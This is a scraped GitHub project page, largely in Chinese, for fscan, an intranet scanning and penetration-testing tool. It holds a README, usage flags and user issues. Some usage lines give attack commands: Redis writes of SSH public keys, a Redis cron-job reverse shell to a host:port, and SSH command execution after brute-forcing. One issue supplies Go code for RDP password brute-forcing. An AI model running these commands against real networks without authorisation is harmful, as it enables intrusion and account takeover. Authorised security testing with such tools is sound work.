一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

Related tags

Security fscan
Overview

fscan

简介

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描等。

主要功能

1.信息搜集:

  • 存活探测(icmp)
  • 端口扫描

2.爆破功能:

  • 各类服务爆破(ssh、smb等)
  • 数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

  • 获取目标网卡信息
  • 高危漏洞扫描(ms17010等)

4.Web探测功能:

  • webtitle探测
  • web指纹识别(常见cms、oa框架等)
  • web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

  • redis写公钥或写计划任务
  • ssh命令执行

6.其他功能:

  • 文件保存

usege

简单用法

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)

其他用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)

编译命令

go build -ldflags="-s -w " -trimpath

完整参数

   -Num int
        poc rate (default 20)
  -c string
        exec command (ssh)
  -cookie string
        set poc cookie
  -debug
        debug mode will print more error info
  -domain string
        smb domain
  -h string
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        host file, -hs ip.txt
  -m string
        Select scan type ,as: -m ssh (default "all")
  -no
        not to save output log
  -nopoc
        not to scan web vul
  -np
        not to ping
  -o string
        Outputfile (default "result.txt")
  -p string
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
  -ping
        using ping replace icmp
  -pocname string
        use the pocs these contain pocname, -pocname weblogic
  -proxy string
        set poc proxy, -proxy http://127.0.0.1:8080
  -pwd string
        password
  -pwdf string
        password file
  -rf string
        redis file to write sshkey file (as: -rf id_rsa.pub)
  -rs string
        redis shell to write cron file (as: -rs 192.168.1.1:6666)
  -t int
        Thread nums (default 600)
  -time int
        Set timeout (default 3)
  -u string
        url
  -uf string
        urlfile
  -user string
        username
  -userf string
        username file
  -wt int
        Set web timeout (default 5)

运行截图

fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc

参考链接

https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc

最近更新

[+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描
[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml
[+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。
[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。
修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度
[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试
[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)
[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。
[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。
[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段
[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理

Issues
  • 编译出错

    编译出错

    D:\Code\Golang\fscan>go build -ldflags="-s -w " -trimpath

    runtime/cgo

    cgo: C compiler "gcc" not found: exec: "gcc": executable file not found in %PATH%

    下载昨天更新go.mod之后的版本出现了这个问题,3天前那版可以正常编译。

    opened by P4r4d1se 7
  •  poc-yaml-thinkadmin-v6-readfile environment creation error: unsupported type: *lib.UrlType

    poc-yaml-thinkadmin-v6-readfile environment creation error: unsupported type: *lib.UrlType

    师傅,根据你的更新修改了相应的代码,但是报了这些错误。师傅知道怎么修改吗? 报错如下:

    [-] poc-yaml-metinfo-cve-2019-17418-sqli environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-minio-default-password environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-metinfo-lfi-cnvd-2018-13393 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-apache-httpd-cve-2021-40438-ssrf environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-apache-httpd-cve-2021-41773-rce environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-apache-httpd-cve-2021-41773-path-traversal environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-laravel-debug-info-leak environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-laravel-improper-webdir environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nextjs-cve-2017-16877 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-msvod-sqli environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-myucms-lfr environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10735 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10738 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-natshell-arbitrary-file-read environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-netentsec-icg-default-password environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-netentsec-ngfw-rce environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-netgear-cve-2017-5521 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-maccms-rce environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10737 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-bash-cve-2014-6271 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-airflow-unauth environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10736 environment creation error: unsupported type: *lib.UrlType ……

    opened by z1mu 6
  • 建议增加针对rdp的爆破功能

    建议增加针对rdp的爆破功能

    参考https://github.com/tomatome/grdp/ 可以很容易实现,代码太丑陋就不放了,给师傅个建议

    func RdpScan(info *common.HostInfo) (tmperr error) {
    	if common.IsBrute {
    		return
    	}
    	starttime := time.Now().Unix()
    	for _, user := range common.Userdict["rdp"] {
    		for _, pass := range common.Passwords {
    			pass = strings.Replace(pass, "{user}", user, -1)
    			port, err := strconv.Atoi(info.Ports)
    			flag, err := RdpConn(info.Host, info.Domain, user, pass, port)
    			if flag == true && err == nil {
    				result := fmt.Sprintf("[+] RDP:%v:%v:%v %v", info.Host, info.Ports, user, pass)
    				common.LogSuccess(result)
    				return err
    			} else {
    				errlog := fmt.Sprintf("[-] rdp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
    				common.LogError(errlog)
    				tmperr = err
    				if common.CheckErrs(err) {
    					return err
    				}
    				if time.Now().Unix()-starttime > (int64(len(common.Userdict["rdp"])*len(common.Passwords)) * info.Timeout) {
    					return err
    				}
    			}
    		}
    	}
    	return tmperr
    }
    
    func RdpConn(ip, domain, login, password string, port int) (bool, error) {
    	target := fmt.Sprintf("%s:%d", ip, port)
    	err := grdp.Login(target, domain, login, password)
    
    	if err != nil {
    		return false, err
    	}
    	return true, err
    }
    
    opened by Alberthchang 6
  • 我一个朋友的一些建议

    我一个朋友的一些建议

    A: 你之前说最新的fscan有什么问题了?

    XXXXXX: 还是有乱码

    A: 还有其他吗

    XXXXXX: 指result.txt里面的乱码

    A: image

    A: 他只处理了这三种编码 ISO也很常见 没加进去

    XXXXXX: 原来如此,给他提个issue

    A: 自己改还快些

    A: image

    A: 除了443 其他都用http协议访问 难怪会漏报

    XXXXXX: 继续提issue

    XXXXXX: 让他两种都试试

    A: 我先看完吧 他后面有个函数好像能识别https的 另外还有处理

    A: 还真的是只识别443端口,另外就是302跳转他也只跳一次,昨天我爆破好几个站点都是跳三次的,虽然第一次登陆可能一般只会有一次跳转

    XXXXXX: 给他提issuse

    A: 你去啊

    A: 我不做伸手党

    opened by lovelyjuice 6
  • -np 禁ping时的BUG

    -np 禁ping时的BUG

    环境MAC(windows下正常)

    辛苦作者大大

    正常情况下:

    go run main.go -h 172.20.10.1/24
    
    (Ping) Target '172.20.10.15' is alive
    (Ping) Target '172.20.10.1' is alive
    (Ping) Target '172.20.10.3' is alive
    icmp alive hosts len is: 3
    172.20.10.1:21 open
    

    -np下扫描导致错误,并且无法自动结束。

    go run main.go -h 172.20.10.1/24 -np
    
    172.20.10.63:21 open
    172.20.10.29:21 open
    172.20.10.62:21 open
    open result.txt: too many open files
    open result.txt: too many open files
    172.20.10.64:21 open
    open result.txt: too many open files
    172.20.10.54:21 open
    open result.txt: too many open files
    ...
    
    opened by butnomingzi 6
  • 表哥好 提示 undefined: MS17010EXP 与 not enough arguments in call to 错误

    表哥好 提示 undefined: MS17010EXP 与 not enough arguments in call to 错误

    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go env -w GOPROXY=https://goproxy.cn,direct PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go mod tidy PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go build -ldflags="-s -w " -trimpath

    github.com/shadow1ng/fscan/Plugins

    Plugins\ms17010.go:133:4: undefined: MS17010EXP Plugins\scanner.go:16:28: not enough arguments in call to "github.com/shadow1ng/fscan/common".ParseIP have (string, string) want (string, string, string)

    opened by sevendian 5
  • 目前使用1.5.1版本时,爆破ssh与smb存在问题

    目前使用1.5.1版本时,爆破ssh与smb存在问题

    目前在公司对一个B段进行内部安全排查,发现更新后的版本似乎SSH与SMB爆破结果都是空的。默认线程600,为了准确性我们将线程为100,依然获取不想预期的结果。账号,口令 (其中账号口令是已经确认的) 是通过参数指定,命令如下: ./fscan_amd64_upx -h 10.x.0.1/16 -user xxx -pwd xxx -t 100

    opened by ghost 5
  • [Chore] license

    [Chore] license

    Hi,

    Could you choose a license so we can include your tool in BlackArch Linux.

    here are the consequences of no license and why we can't share it: https://choosealicense.com/no-permission/

    Thanks

    opened by noraj 4
  • 使用go build -ldflags=

    使用go build -ldflags="-s -w " -trimpath main.go这个编译命令,编译失败

    出现这个告警,go: github.com/denisenkom/[email protected]: git init --bare in C:\Users\用户\go\pkg\mod\cache\vcs\827fc7d8d4932fa3c473f8716b1123200a0073784d1f12e94bbeb63e9646f34f: exec: "git": executable file not found in %PATH%

    opened by W-Beacon 8
  • 扫描多网段和port为1-65535时候程序会崩溃

    扫描多网段和port为1-65535时候程序会崩溃

    [*] Icmp alive hosts len is: 16384
    runtime: VirtualAlloc of 25769410560 bytes failed with errno=1455
    fatal error: out of memory
    
    runtime stack:
    runtime.throw({0xad0738, 0xc205de6000})
            runtime/panic.go:1198 +0x76
    runtime.sysUsed(0xc001770000, 0x5fffa0000)
            runtime/mem_windows.go:83 +0x1c9
    runtime.(*mheap).allocSpan(0x180fd60, 0x2fffd0, 0x0, 0x0)
            runtime/mheap.go:1268 +0x3a5
    runtime.(*mheap).alloc.func1()
            runtime/mheap.go:913 +0x69
    runtime.systemstack()
            runtime/asm_amd64.s:383 +0x4e
    
    goroutine 1 [running]:
    runtime.systemstack_switch()
            runtime/asm_amd64.s:350 fp=0xc0000a7968 sp=0xc0000a7960 pc=0x2d2080
    runtime.(*mheap).alloc(0x5fffa0000, 0x2fffd0, 0x0, 0x1)
            runtime/mheap.go:907 +0x73 fp=0xc0000a79b8 sp=0xc0000a7968 pc=0x2963b3
    runtime.(*mcache).allocLarge(0x127f3fabb00, 0x5fffa0000, 0x60, 0x0)
            runtime/mcache.go:227 +0x89 fp=0xc0000a7a18 sp=0xc0000a79b8 pc=0x286c29
    runtime.mallocgc(0x5fffa0000, 0xa17f60, 0x1)
            runtime/malloc.go:1082 +0x5c5 fp=0xc0000a7a98 sp=0xc0000a7a18 pc=0x27d045
    runtime.makechan(0x0, 0x3fffc000)
            runtime/chan.go:106 +0xe5 fp=0xc0000a7ad8 sp=0xc0000a7a98 pc=0x275345
    github.com/shadow1ng/fscan/Plugins.PortScan({0xc00082e000, 0x4000, 0xc0000a7e28}, {0xc0000320f8, 0x7}, 0x3)
            github.com/shadow1ng/fscan/Plugins/portscan.go:39 +0x2f4 fp=0xc0000a7cc8 sp=0xc0000a7ad8 pc=0x9407d4
    github.com/shadow1ng/fscan/Plugins.Scan({{0x0, 0x0}, {0xc0000320f8, 0x7}, {0x0, 0x0}, {0x0, 0x0, 0x0}})
            github.com/shadow1ng/fscan/Plugins/scanner.go:37 +0x310 fp=0xc0000a7ef8 sp=0xc0000a7cc8 pc=0x946a30
    main.main()
            github.com/shadow1ng/fscan/main.go:14 +0x85 fp=0xc0000a7f80 sp=0xc0000a7ef8 pc=0x94cf65
    runtime.main()
            runtime/proc.go:255 +0x217 fp=0xc0000a7fe0 sp=0xc0000a7f80 pc=0x2a8f97
    runtime.goexit()
            runtime/asm_amd64.s:1581 +0x1 fp=0xc0000a7fe8 sp=0xc0000a7fe0 pc=0x2d4401
    
    goroutine 6 [sleep]:
    time.Sleep(0x2540be400)
            runtime/time.go:193 +0x133
    github.com/shadow1ng/fscan/common.init.0.func1()
            github.com/shadow1ng/fscan/common/flag.go:15 +0x2e
    created by github.com/shadow1ng/fscan/common.init.0
            github.com/shadow1ng/fscan/common/flag.go:11 +0x25
    
    goroutine 7 [chan receive]:
    github.com/shadow1ng/fscan/common.SaveLog()
            github.com/shadow1ng/fscan/common/log.go:32 +0x54
    created by github.com/shadow1ng/fscan/common.init.1
            github.com/shadow1ng/fscan/common/log.go:22 +0x25
    
    opened by SkyBlueEternal 0
  • 302重定向处理

    302重定向处理

    如果目标url一直进行302重定向,title扫描时会再跟踪10次重定向连接,并不再进行poc扫描。 可以限制重定向跟踪次数,到达限制次数后仍进行poc扫描吗。 测试环境可以用vulhub:https://github.com/vulhub/vulhub/tree/master/nginx/insecure-configuration

    opened by qiaoba22 0
  • fatal error: runtime: out of memory

    fatal error: runtime: out of memory

    ./fscan_amd64 -hf pool.txt -nopoc -nobr -np -o results.txt


    / _ \ ___ ___ _ __ __ _ | | __ / /// |/ | '/ ` |/ __| |/ / / /\_ \ (| | | (_| | (| <
    _/ |/_|| _,_|_|_|_\
    fscan version: 1.8.1 start infoscan fatal error: runtime: out of memory

    runtime stack: runtime.throw({0xc602a5, 0x14ebc00000}) runtime/panic.go:1198 +0x71 runtime.sysMap(0xc0c7400000, 0x4296e0, 0xc000661e90) runtime/mem_linux.go:169 +0x96 runtime.(*mheap).grow(0x19895c0, 0xa75df1) runtime/mheap.go:1393 +0x225 runtime.(*mheap).allocSpan(0x19895c0, 0xa75df1, 0x0, 0x0) runtime/mheap.go:1179 +0x165 runtime.(*mheap).alloc.func1() runtime/mheap.go:913 +0x69 runtime.systemstack() runtime/asm_amd64.s:383 +0x49

    goroutine 1 [running]: runtime.systemstack_switch() runtime/asm_amd64.s:350 fp=0xc00030d968 sp=0xc00030d960 pc=0x460d00 runtime.(*mheap).alloc(0x14ebbe2000, 0xa75df1, 0x0, 0x1) runtime/mheap.go:907 +0x73 fp=0xc00030d9b8 sp=0xc00030d968 pc=0x425933 runtime.(*mcache).allocLarge(0x7ff19554eec8, 0x14ebbe2000, 0x60, 0x0) runtime/mcache.go:227 +0x89 fp=0xc00030da18 sp=0xc00030d9b8 pc=0x4165a9 runtime.mallocgc(0x14ebbe2000, 0xb9e860, 0x1) runtime/malloc.go:1082 +0x5c5 fp=0xc00030da98 sp=0xc00030da18 pc=0x40cb25 runtime.makechan(0x0, 0xdf27ec00) runtime/chan.go:106 +0xe5 fp=0xc00030dad8 sp=0xc00030da98 pc=0x405005 github.com/shadow1ng/fscan/Plugins.PortScan({0xc039380000, 0x1060e00, 0x7ffdc83c37f6}, {0xc0001e0480, 0x45c}, 0x3) github.com/shadow1ng/fscan/Plugins/portscan.go:39 +0x2f4 fp=0xc00030dcc8 sp=0xc00030dad8 pc=0xac6db4 github.com/shadow1ng/fscan/Plugins.Scan({{0x0, 0x0}, {0xc0001e0480, 0x45c}, {0x0, 0x0}, {0x0, 0x0, 0x0}}) github.com/shadow1ng/fscan/Plugins/scanner.go:37 +0x310 fp=0xc00030def8 sp=0xc00030dcc8 pc=0xacd010 main.main() github.com/shadow1ng/fscan/main.go:14 +0x85 fp=0xc00030df80 sp=0xc00030def8 pc=0xad3545 runtime.main() runtime/proc.go:255 +0x227 fp=0xc00030dfe0 sp=0xc00030df80 pc=0x435cc7 runtime.goexit() runtime/asm_amd64.s:1581 +0x1 fp=0xc00030dfe8 sp=0xc00030dfe0 pc=0x462de1

    goroutine 6 [sleep]: time.Sleep(0x2540be400) runtime/time.go:193 +0x12e github.com/shadow1ng/fscan/common.init.0.func1() github.com/shadow1ng/fscan/common/flag.go:15 +0x2e created by github.com/shadow1ng/fscan/common.init.0 github.com/shadow1ng/fscan/common/flag.go:11 +0x25

    goroutine 7 [chan receive]: github.com/shadow1ng/fscan/common.SaveLog() github.com/shadow1ng/fscan/common/log.go:32 +0x54 created by github.com/shadow1ng/fscan/common.init.1 github.com/shadow1ng/fscan/common/log.go:22 +0x25

    opened by fengx1a0 1
Releases(1.8.1)
Owner
影舞者
影舞者